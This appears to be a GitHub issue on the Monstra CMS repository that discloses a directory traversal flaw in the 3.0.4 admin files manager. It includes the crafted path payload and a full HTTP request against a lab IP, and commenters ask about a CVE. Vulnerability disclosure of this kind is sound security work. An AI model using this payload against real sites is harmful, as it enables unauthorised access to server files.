directory traversal in in Monstra-dev

xiaohuihui1113 commented 6 years ago

visit：http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./ can traversal any directory

example：

request： `GET /monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./ HTTP/1.1 Host: 172.16.173.238 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: PHPSESSID=ph583h01pp9m9pbbi3of3bipm5; _ga=GA1.1.292621617.1535549034; _gid=GA1.1.1816700239.1535549034 Connection: close Upgrade-Insecure-Requests: 1

`

response：

DanielRuf commented 5 years ago

Ouch. Not great.

DanielRuf commented 5 years ago

Did you already request a CVE number?

monstra-cms / monstra

directory traversal in in Monstra-dev #457